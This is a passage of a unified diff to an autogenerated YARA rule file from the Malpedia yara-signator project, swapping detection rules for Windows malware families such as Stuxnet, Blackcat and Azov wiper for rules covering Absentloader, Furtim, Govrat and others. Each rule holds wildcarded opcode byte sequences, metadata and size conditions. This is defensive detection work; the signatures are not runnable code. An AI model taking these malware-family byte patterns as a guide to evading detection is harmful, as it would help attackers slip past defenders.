+		$sequence_5 = { 8b4e08 3bcb 740d 40 83c654 3bc2 72f1 }
+		$sequence_6 = { ff7548 68???????? 55 e8???????? 83c40c 85c0 0f85b8010000 }
+		$sequence_7 = { 8b7d08 8b472c 85c0 0f84a6000000 53 8b5d0c 56 }
+		$sequence_8 = { ff75f4 ff750c 57 e8???????? 83c418 85c0 0f84b3feffff }
+		$sequence_9 = { e8???????? ff75cc 57 53 e8???????? 8b55b8 52 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 2244608
 }
-rule MALPEDIA_Win_Vmzeus_Auto : FILE
+rule MALPEDIA_Win_Absentloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b33099d-6223-5a8a-8424-386c7b1a44ee"
+		id = "6f362b30-2c49-5b13-a74d-e646b2c361d8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vmzeus_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.absentloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.absentloader_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "17e1987d98b8da94f97f8bd71f2765f1dddeafbd1967101797951278b17d5b65"
+		logic_hash = "ec030f0c846e40821b8f0d08fe92e09a60380de99ecc678dae260a482a99d7bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112167,32 +112199,32 @@ rule MALPEDIA_Win_Vmzeus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f3a4 b001 eb02 32c0 }
-		$sequence_1 = { 7508 6a04 58 e9???????? 32c0 6a4c }
-		$sequence_2 = { 6a4c 8d7c242c 59 f3aa }
-		$sequence_3 = { f3a4 b001 eb02 32c0 5f 5e }
-		$sequence_4 = { 58 e9???????? 32c0 6a4c 8d7c242c 59 f3aa }
-		$sequence_5 = { e9???????? 32c0 6a4c 8d7c242c }
-		$sequence_6 = { 58 e9???????? 32c0 6a4c 8d7c242c }
-		$sequence_7 = { 7508 6a04 58 e9???????? 32c0 }
-		$sequence_8 = { 6a10 32c0 59 8bfb }
-		$sequence_9 = { 6a04 58 e9???????? 32c0 6a4c }
+		$sequence_0 = { e8???????? 50 8bce e8???????? 834dfcff 8d85f0f9ffff 50 }
+		$sequence_1 = { 8b08 8bc3 2bc1 c1f804 3bf0 7238 }
+		$sequence_2 = { 5e 8b448dd8 83e825 6bc033 99 f7fe }
+		$sequence_3 = { 6a7f 0f1145dc c745ec59000000 5f 6a32 58 2b448ddc }
+		$sequence_4 = { 48 a3???????? ff15???????? 8b0d???????? 89048db09506fd 5d c3 }
+		$sequence_5 = { 68087905fd 68007905fd 68087905fd 6a06 e8???????? 8bf0 }
+		$sequence_6 = { e8???????? 83ec18 c645fc07 8bcc 68a8f905fd 895910 c741140f000000 }
+		$sequence_7 = { 8b08 bfc8aa06fd 0f2805???????? a1???????? 0f1145dc c745ec0e5a410e }
+		$sequence_8 = { 40 83f80e 72f6 8bc1 c3 80791300 740c }
+		$sequence_9 = { 57 bf88a706fd 8d75e8 689f0705fd a5 a5 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 794624
 }
-rule MALPEDIA_Win_Fakerean_Auto : FILE
+rule MALPEDIA_Win_Furtim_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9b6d4199-0c17-5326-ad0f-5be4f4e0c769"
+		id = "ad577b23-66c9-5c51-817c-414dfaa85803"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fakerean"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fakerean_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.furtim_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "697015d76e682efb24cb879c686000a5c02640696936de86fa6c90584950d55f"
+		logic_hash = "d317e4f334ec1dda33c613c0848248b97fb2b5924cd44cad020709ead778cee8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112206,32 +112238,32 @@ rule MALPEDIA_Win_Fakerean_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7508 898348030000 ff15???????? 5f 5e 5b c9 }
-		$sequence_1 = { 50 e8???????? 83c40c 8b4640 2b4638 85c0 7f1c }
-		$sequence_2 = { ff15???????? a1???????? 8b08 6a01 ff35???????? 50 ff5128 }
-		$sequence_3 = { 8845f8 84c9 7419 8b4508 0345fc 0fb6d9 }
-		$sequence_4 = { 8d45f0 50 ff7608 ff15???????? 83f801 743e 83f802 }
-		$sequence_5 = { e8???????? 83c428 8935???????? 5f 5e c9 c3 }
-		$sequence_6 = { 8b45f0 eb03 8b45ec 8945f8 eb1d 8b45fc ebf6 }
-		$sequence_7 = { 8bc2 ab ab ab ab 6a08 59 }
-		$sequence_8 = { c6450f30 eb0f 83fe01 0f95c0 fec8 2420 0441 }
-		$sequence_9 = { f7fb 83c230 668911 03cf 397d0c 7512 85c0 }
+		$sequence_0 = { c3 55 8bec 83ec68 53 56 68???????? }
+		$sequence_1 = { 85c0 7413 8b4c2424 8bd1 2bd6 8a12 8811 }
+		$sequence_2 = { 55 8bec 8b4508 ff34c5d0404100 ff15???????? 5d c3 }
+		$sequence_3 = { 5e 5b c9 c20800 56 8bf1 ff96d4060000 }
+		$sequence_4 = { 8bf8 68???????? 57 ff961c070000 83c40c 6a0b 57 }
+		$sequence_5 = { 33db 895de8 8d7dec ab ab ab 8d45fc }
+		$sequence_6 = { ff969c020000 85c0 0f850d010000 33db 399e08060000 0f84f7000000 33c0 }
+		$sequence_7 = { 895df4 ff9660060000 85c0 7532 385dfc 742d 0fb645fc }
+		$sequence_8 = { 7405 8bce ff5614 53 53 56 ffb640070000 }
+		$sequence_9 = { 56 53 ffb360020000 8975fc 56 }
 
 	condition:
-		7 of them and filesize < 4071424
+		7 of them and filesize < 622592
 }
-rule MALPEDIA_Win_Stuxnet_Auto : FILE
+rule MALPEDIA_Win_W32Times_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "64e9fab1-7d89-5a6e-8a31-2df625be17c1"
+		id = "8d0ca9de-72d5-5416-8ea3-4ffe99cecdda"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stuxnet_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.w32times"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.w32times_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0de893dd2abe057bcddad1952313e85e04a81b980ccf81d569805dbd5ff30eda"
+		logic_hash = "f7e65aa826ad4cf269428f43fa98d18142b27ed083ec25ea57e656102267e97a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112245,32 +112277,32 @@ rule MALPEDIA_Win_Stuxnet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 84c0 7504 804e1104 e8???????? 84c0 7404 }
-		$sequence_1 = { ff750c 8d4580 50 e8???????? 33db 895dfc 8d4580 }
-		$sequence_2 = { ff75f8 8d963c0b0000 57 e8???????? 59 59 5f }
-		$sequence_3 = { c3 8b44240c 8906 33c0 40 5e c3 }
-		$sequence_4 = { 8d4580 50 8d8540ffffff 50 e8???????? c645fc05 50 }
-		$sequence_5 = { e8???????? ff75c8 8d45ec 50 e8???????? ff75c9 8d45ec }
-		$sequence_6 = { b8???????? e8???????? 51 8365f000 56 8b7508 8d45f0 }
-		$sequence_7 = { e8???????? eb02 33c0 c645fc00 8b7d08 83c704 50 }
-		$sequence_8 = { e8???????? 8906 895604 c9 c3 8b08 8b4004 }
-		$sequence_9 = { 8955ec c7042410270000 e8???????? c645fc01 8b0e 8b01 6a02 }
+		$sequence_0 = { 8d44240c 6a00 50 53 57 56 c744242000000000 }
+		$sequence_1 = { 6a03 55 6a01 8d8c2410080000 6800000080 }
+		$sequence_2 = { 51 ffd6 8b4500 8d54242c }
+		$sequence_3 = { 8bcd 4f c1e902 f3a5 8bcd 8d9424ec010000 83e103 }
+		$sequence_4 = { 3b9c24000d0000 0f84cc090000 8a8424f0020000 84c0 0f84bd090000 8a8424e8000000 84c0 }
+		$sequence_5 = { 7534 8b2d???????? 46 56 68???????? }
+		$sequence_6 = { 8bd8 ffd7 56 ffd7 53 ff15???????? }
+		$sequence_7 = { ebd7 68???????? ff15???????? 8b1d???????? 68???????? ff15???????? 85db }
+		$sequence_8 = { b941000000 bf???????? f3ab b941000000 8dbc24f8050000 }
+		$sequence_9 = { 83c40c 85c0 0f85e00c0000 8b4b04 6a04 }
 
 	condition:
-		7 of them and filesize < 2495488
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Zxxz_Auto : FILE
+rule MALPEDIA_Win_Govrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6bed2c22-407f-5c6f-838c-89149563448f"
+		id = "0c1f568e-0870-502d-8ab7-d2bc8e9569e8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zxxz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zxxz_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.govrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.govrat_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "9578e76393d5b7664234570897b9446d75c18108dd9f2d16b199e15d869c1364"
+		logic_hash = "abfba34e1bd79612302779859a269397cc43e8444d7e6090aaef75a3d69df6b1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112284,37 +112316,32 @@ rule MALPEDIA_Win_Zxxz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd3 e8???????? 6830750000 ffd3 6a01 6a00 }
-		$sequence_1 = { 68fa000000 50 ffd5 83c40c 68???????? 8d4c2414 }
-		$sequence_2 = { c605????????01 6830750000 ffd3 68???????? }
-		$sequence_3 = { c20400 8bfe 83cf0f 81ffffffff7f 7627 }
-		$sequence_4 = { 8d4c2430 c744241401000000 c644242400 ff15???????? 8bc5 8b4c241c }
-		$sequence_5 = { 83c404 e8???????? 803d????????00 7435 33c0 68fe1f0000 }
-		$sequence_6 = { ff7508 8945f4 6a00 68e9fd0000 ffd0 }
-		$sequence_7 = { 51 ff55ec 83c404 8bc6 8bcf 8901 }
-		$sequence_8 = { 6a01 6a01 68???????? ffd7 a1???????? 2bc3 }
-		$sequence_9 = { 8b01 ff5004 c745fcffffffff 8b9558feffff 83c2f0 }
-		$sequence_10 = { eb23 03c8 c744241c01000000 83fa02 770c 8079fe3d 7506 }
-		$sequence_11 = { 33c0 68f8000000 8bd9 50 }
-		$sequence_12 = { c705????????1cb94000 7410 a1???????? 85c0 7407 50 }
-		$sequence_13 = { 85c0 0f84ef000000 eb06 8bc7 8930 }
-		$sequence_14 = { 8bc6 8931 6a00 6a00 53 }
+		$sequence_0 = { 8d4dc4 e8???????? 8b00 50 8d4708 895f10 895f14 }
+		$sequence_1 = { 897804 8b7904 8930 8b31 0facfe01 d1ef 83780400 }
+		$sequence_2 = { 59 03f1 8dbc24b8000000 33c0 f3a7 7418 }
+		$sequence_3 = { ff15???????? 83a65401000000 c3 53 55 56 8d6f44 }
+		$sequence_4 = { ff15???????? 83a65401000000 c3 53 55 }
+		$sequence_5 = { 6a00 6a00 ff15???????? 8b4c2404 8901 85c0 7404 }
+		$sequence_6 = { 832d????????04 e9???????? 55 8bec 83ec14 a1???????? 53 }
+		$sequence_7 = { 7543 837d1000 0f845cfeffff 8b87a8000000 2b442420 8b8fac000000 1b4c2424 }
+		$sequence_8 = { 8d4df8 8d4518 e8???????? 8b45f8 0b45fc 750a 2145fc }
+		$sequence_9 = { 8945f8 8b4508 ff700c ff15???????? 8bf0 }
 
 	condition:
-		7 of them and filesize < 4142080
+		7 of them and filesize < 761856
 }
-rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
+rule MALPEDIA_Win_Gibberish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0c279999-73dd-553b-a33f-fb7233640f4d"
+		id = "d0f0a81c-c436-554f-886e-c05189a90753"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_kt3"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_kt3_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gibberish_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "43bd0b6c16f3b291b1fdceb004531872c299302c3bdde3bd6c507ecd76a92465"
+		logic_hash = "ec3ea314ac6eedd0a24b154c568d1f6c449d7a6dabe6072547ddc0bc708507da"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112328,34 +112355,34 @@ rule MALPEDIA_Win_Webc2_Kt3_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c1ff 51 8b4df4 51 8b15???????? 52 }
-		$sequence_1 = { 51 e8???????? 83c404 8985e0fbffff 8b85e0fbffff 8985ecfbffff }
-		$sequence_2 = { 8b4dfc 0fbe5103 83fa3e 750f }
-		$sequence_3 = { 0f8408000000 0f8502000000 ebe9 c745dc00000000 }
-		$sequence_4 = { 8b55f8 2b55fc 8955f8 ebb7 8b4510 5f }
-		$sequence_5 = { 51 8b55f4 52 8d4de4 e8???????? 8b45e8 }
-		$sequence_6 = { 8b4dfc 83c10b 894df4 6a20 }
-		$sequence_7 = { 8d41fc 8b4c2404 2bc1 c3 6800000300 }
-		$sequence_8 = { 8dbdecfeffff 83c9ff 33c0 f2ae f7d1 83c1ff }
-		$sequence_9 = { 51 8b55f4 52 8d4de4 e8???????? }
+		$sequence_0 = { 894dec 8975e8 668907 894dfc 8bce c745f001000000 8d5102 }
+		$sequence_1 = { 8b74242c 8bd0 8944245c 8bce 8bc6 c1c90b c1c007 }
+		$sequence_2 = { 68???????? ff15???????? 85c0 7424 56 56 8d85fcfffdff }
+		$sequence_3 = { 8b0ccdf2a94700 0fb680c8a94500 330cc5f1a94700 8bc2 c1e818 0fb680c8a94500 330cc5f4a94700 }
+		$sequence_4 = { 330a 85d2 894b04 8d4a04 0f44ca }
+		$sequence_5 = { ffd3 8b45d8 8d3446 33c0 83c602 663906 75c3 }
+		$sequence_6 = { f30f7e05???????? 0f114c2420 0f284c2450 660f3840c8 0f10442420 0f11542470 }
+		$sequence_7 = { 7535 017524 297528 2bd6 8b5c242c 5f }
+		$sequence_8 = { 6af5 eb03 50 6af6 ff15???????? 8b04bd80b64700 }
+		$sequence_9 = { 33c8 8b44241c 33c6 23442414 33c6 03c8 8b442474 }
 
 	condition:
-		7 of them and filesize < 114688
+		7 of them and filesize < 1068032
 }
-rule MALPEDIA_Win_Nightsky_Auto : FILE
+rule MALPEDIA_Win_Red_Gambler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49806bb3-db04-5175-bd2d-05a084f5301e"
+		id = "424f410a-a1db-5f80-8bc0-d2770de1bebd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightsky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightsky_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.red_gambler_auto.yar#L1-L298"
 		license_url = "N/A"
-		logic_hash = "58c0a44a79ed929ad206a6701f3a4c117bf07ad9e9a507d5d3b0ad9c115c5cd3"
+		logic_hash = "b3fef0f5439e9ff88d33fd6c22b22c41979ab9321c0a109b616fbbcd9f2274a0"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112367,32 +112394,54 @@ rule MALPEDIA_Win_Nightsky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bda 420fb6bc3010680500 418bc3 c1e708 48c1e810 0fb6c8 420fb6843110680500 }
-		$sequence_1 = { 83f806 0f879c010000 488d155277ffff 4898 8b8c82948a0000 4803ca ffe1 }
-		$sequence_2 = { 488bd7 498bcc ff15???????? 4c8d4c2470 48895c2420 41b800000800 498bd6 }
-		$sequence_3 = { 4883c602 66833e00 758d 483bf5 765e 482bf5 48d1fe }
-		$sequence_4 = { 488905???????? 4885db 488d059af90400 488905???????? b830000000 480f44d8 486305???????? }
-		$sequence_5 = { 4983f940 72eb e9???????? 488d059e1f0000 48b90000000000000080 488987c8000000 488d0576900200 }
-		$sequence_6 = { 488d05ba8b0200 c7475001000000 48c7475804000000 48894778 488d0508520300 c7476801000000 48c7477004000000 }
-		$sequence_7 = { e8???????? 486305???????? 4c8d0516060500 83f814 0f8d99000000 488bc8 488d0480 }
-		$sequence_8 = { 458b849610710500 48c1eb18 4533848e10810500 4533848610640500 410fb6c3 49c1eb08 410fb6ca }
-		$sequence_9 = { 0fb64103 468b8c8710750500 0fb6943810630500 0fb64102 44338c9710640500 0fb6943810630500 }
+		$sequence_0 = { 6800010000 8d440601 50 68???????? e9???????? 68???????? }
+		$sequence_1 = { 55 8bec 837d0c10 56 57 }
+		$sequence_2 = { 8d55fc 52 56 6a00 6880000000 6a02 ffd7 }
+		$sequence_3 = { 33db 68ff000000 8d44244d 53 }
+		$sequence_4 = { 8b1d???????? 8da42400000000 6a00 68???????? ffd3 }
+		$sequence_5 = { ff15???????? 85c0 7520 8b542418 52 8d84243c010000 }
+		$sequence_6 = { 33c8 03ff 03ff 83e1f0 }
+		$sequence_7 = { 90 57 8d95fcfeffff 52 }
+		$sequence_8 = { 52 ff15???????? 8d8594fbffff 50 }
+		$sequence_9 = { 7f6f c8603a0c 7364 42 e5e1 5f }
+		$sequence_10 = { 3d067c263c 3c3d 9e e7bd }
+		$sequence_11 = { 6800010000 8d8dfcfdffff 51 6a00 }
+		$sequence_12 = { 64f33c87 3cfb 3ccd 047e 0000 3e2a6616 2bb0775ea707 }
+		$sequence_13 = { ff15???????? 83c414 6a00 6a00 8d9598fbffff }
+		$sequence_14 = { 8d8594fbffff 50 8d4d98 51 ff15???????? }
+		$sequence_15 = { 2bb0775ea707 2d9e2b3706 d7 e8???????? 004f21 7ea2 }
+		$sequence_16 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? }
+		$sequence_17 = { 68???????? 8d8d98fbffff 68???????? 51 }
+		$sequence_18 = { 8d9598fbffff 52 68???????? 6a00 6a00 ff15???????? 8b4dfc }
+		$sequence_19 = { 2b2a bee7eee947 7c26 0e 6706 7e0e 2829 }
+		$sequence_20 = { 8d5598 52 8d8598fdffff 50 68???????? 8d8d98fbffff }
+		$sequence_21 = { 6800010000 8d8d98fdffff 51 8d9598feffff }
+		$sequence_22 = { 74be 6f 665b e17a 6c 8737 27 }
+		$sequence_23 = { 4c 48 44 40 }
+		$sequence_24 = { 6e 44 b11a dfaf4e71ac05 }
+		$sequence_25 = { ff96bcd60000 83c704 8d5efc 31c0 }
+		$sequence_26 = { ffd3 68???????? 56 8bf8 ffd3 8bd8 ffd7 }
+		$sequence_27 = { ff15???????? 40 68???????? 50 ff15???????? 8d8dfcfeffff }
+		$sequence_28 = { a1???????? a3???????? a1???????? c705????????6b214000 8935???????? a3???????? }
+		$sequence_29 = { c1f805 c1e606 033485c0974000 8b45f8 }
+		$sequence_30 = { 85f6 0f8492000000 8b1d???????? 68???????? }
+		$sequence_31 = { f2ae 55 ff96acd60000 09c0 7407 8903 83c304 }
 
 	condition:
-		7 of them and filesize < 19536896
+		7 of them and filesize < 327680
 }
-rule MALPEDIA_Win_Tabmsgsql_Auto : FILE
+rule MALPEDIA_Win_Mewsei_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "613cbea2-b3e6-59ad-af97-1c16f24a8ca2"
+		id = "add045ad-b22b-5690-8008-c500cb8eb696"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tabmsgsql_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mewsei"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mewsei_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "fea9841dfc3e899e511f6e59152b7eb3a1bf8ea0929e01fae7a33a41386cf162"
+		logic_hash = "25d3161d5bf746c6ecd7f709f19943bce6135e5cdd1b0f6ec1d26ee45065cb61"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112406,32 +112455,32 @@ rule MALPEDIA_Win_Tabmsgsql_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c404 ff15???????? 5e 33c0 5b 81c404d00700 }
-		$sequence_1 = { e9???????? 8b0d???????? 3bcb 0f8463feffff a1???????? 3bc3 0f8456feffff }
-		$sequence_2 = { 6a01 8bcb ff15???????? eb45 8b430c 83f81f 7704 }
-		$sequence_3 = { 83c9ff 33c0 8d951217fcff f2ae f7d1 2bf9 50 }
-		$sequence_4 = { 8b842430f50100 83c424 85c0 5f }
-		$sequence_5 = { 51 b9???????? 895dfc a2???????? e8???????? 3bc3 0f84d7000000 }
-		$sequence_6 = { f3a5 8bc8 33c0 83e103 f3a4 8bbc2438060000 83c9ff }
-		$sequence_7 = { 5b 83e103 b801000000 f3a4 }
-		$sequence_8 = { 3de8030000 a3???????? 7d0c c705????????e8030000 }
-		$sequence_9 = { 33c0 68???????? f2ae f7d1 2bf9 8d442434 8bd1 }
+		$sequence_0 = { 037dfc 897df0 0fb6780b c1e708 }
+		$sequence_1 = { c1e708 0fb6582c 0bfb 89b984000000 897dbc 8b7df0 337dfc }
+		$sequence_2 = { 03de 8dbc3b56b7c7e8 0fb6580a c1c70c 037dfc 897df0 0fb6780b }
+		$sequence_3 = { 0f8278ffffff 5b 5f 8bc6 5e }
+		$sequence_4 = { 3bcf 7319 bf???????? 8d5101 2bf9 }
+		$sequence_5 = { c3 8b4d0c 85c9 7411 8bc1 }
+		$sequence_6 = { 6a00 50 68???????? 6a00 6a00 ffd6 50 }
+		$sequence_7 = { 8b08 8b511c 50 ffd2 3bc3 740a 83f801 }
+		$sequence_8 = { 33d2 25ff7f0000 f7f1 80c230 885305 c6430600 85ff }
+		$sequence_9 = { c1ea10 884708 8b4610 884f05 885706 8bc8 8bd0 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 504832
 }
-rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
+rule MALPEDIA_Win_Blackcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d3c9489-8494-515f-a851-2efd685c079b"
+		id = "7d7e215c-b7ec-5d55-a8aa-0595745c47b1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.azov_wiper"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.azov_wiper_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.blackcat_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "7b55d48ad9f56923d371b84a7be8f9204233f80fc6507fb08d7baa3b93540774"
+		logic_hash = "f613dd0b295abc7ed25049f8912ac5a26d116d8e5b2b8db308f5a3d66d3b2048"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112445,34 +112494,34 @@ rule MALPEDIA_Win_Azov_Wiper_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 4883ef01 75e6 488b05???????? 33c9 488b10 }
-		$sequence_1 = { 741e 488b05???????? bafe010000 488bcb 4c8b00 }
-		$sequence_2 = { 4889442420 41ff9258010000 488b8c2470080000 4885c9 7410 488b05???????? }
-		$sequence_3 = { 4c8b10 4883c8ff 0f1f00 66837c410200 488d4001 75f4 }
-		$sequence_4 = { 488d55f3 ffd0 4883ec08 48c7042400000000 }
-		$sequence_5 = { 488b0b 488b10 ff5250 488d5b08 4883ef01 75e6 488b05???????? }
-		$sequence_6 = { 488bce 4c8b10 41ff5240 4885c0 }
-		$sequence_7 = { 498943e0 488d055cfbffff 498943e8 488b05???????? 488bce }
-		$sequence_8 = { 488b3d???????? f20f10842460020000 488b4710 f20f5c4004 660f2f400c 7310 }
-		$sequence_9 = { 488b05???????? 498d8f00040000 48895c2430 4533c9 }
+		$sequence_0 = { 8d4701 31c9 31d2 89460c 4f c745f000000000 }
+		$sequence_1 = { 3c02 7351 88c4 8975cc }
+		$sequence_2 = { 8945e8 0f83a1000000 85db 0f8499000000 803c3b5f }
+		$sequence_3 = { 81f902010000 747b e9???????? 8d81d6c3ffff 83f802 726b 81f9ed350000 }
+		$sequence_4 = { 31f6 c70201000000 c7420400000000 894208 c7420c00000000 0fb788d6040000 }
+		$sequence_5 = { c1e203 662e0f1f840000000000 90 85d2 7411 8b39 83c108 }
+		$sequence_6 = { 0f1f840000000000 6690 55 89e5 }
+		$sequence_7 = { 8b450c 89d6 8a10 80c2e6 80fa05 7779 }
+		$sequence_8 = { 80c230 8894056bffffff 48 e9???????? }
+		$sequence_9 = { 83c40c 84c0 0f858b010000 8d4704 }
 
 	condition:
-		7 of them and filesize < 73728
+		7 of them and filesize < 29981696
 }
-rule MALPEDIA_Win_Yty_Auto : FILE
+rule MALPEDIA_Win_New_Ct_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b178a64d-90f2-5e14-9301-2d60f407465c"
+		id = "df99256a-ac37-54eb-b09f-1730ead584e4"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yty"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yty_auto.yar#L1-L503"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.new_ct_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "ba7411fc89742deab8ac323283edaf67308d62adecd7c34f413e3b6a25925cab"
+		logic_hash = "9eac271e285948f56968d4730b1030e87fbe78a87c978d4507ea0ec6208dc34d"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112480,81 +112529,36 @@ rule MALPEDIA_Win_Yty_Auto : FILE
 		malpedia_rule_date = "20260105"
 		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
 		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 0f840c000000 8365d8fe 8b7508 e9???????? c3 8b542408 8d420c }
-		$sequence_1 = { 64a300000000 8b7508 33ff 897dd8 }
-		$sequence_2 = { 8b5610 33c9 33c0 8d7910 }
-		$sequence_3 = { b901000000 e9???????? 8b5508 397d1c 7303 8d5508 }
-		$sequence_4 = { 5f 668910 8bc6 5b 8be5 5d c20400 }
-		$sequence_5 = { 8bfe 80ea13 b903000000 eb58 }
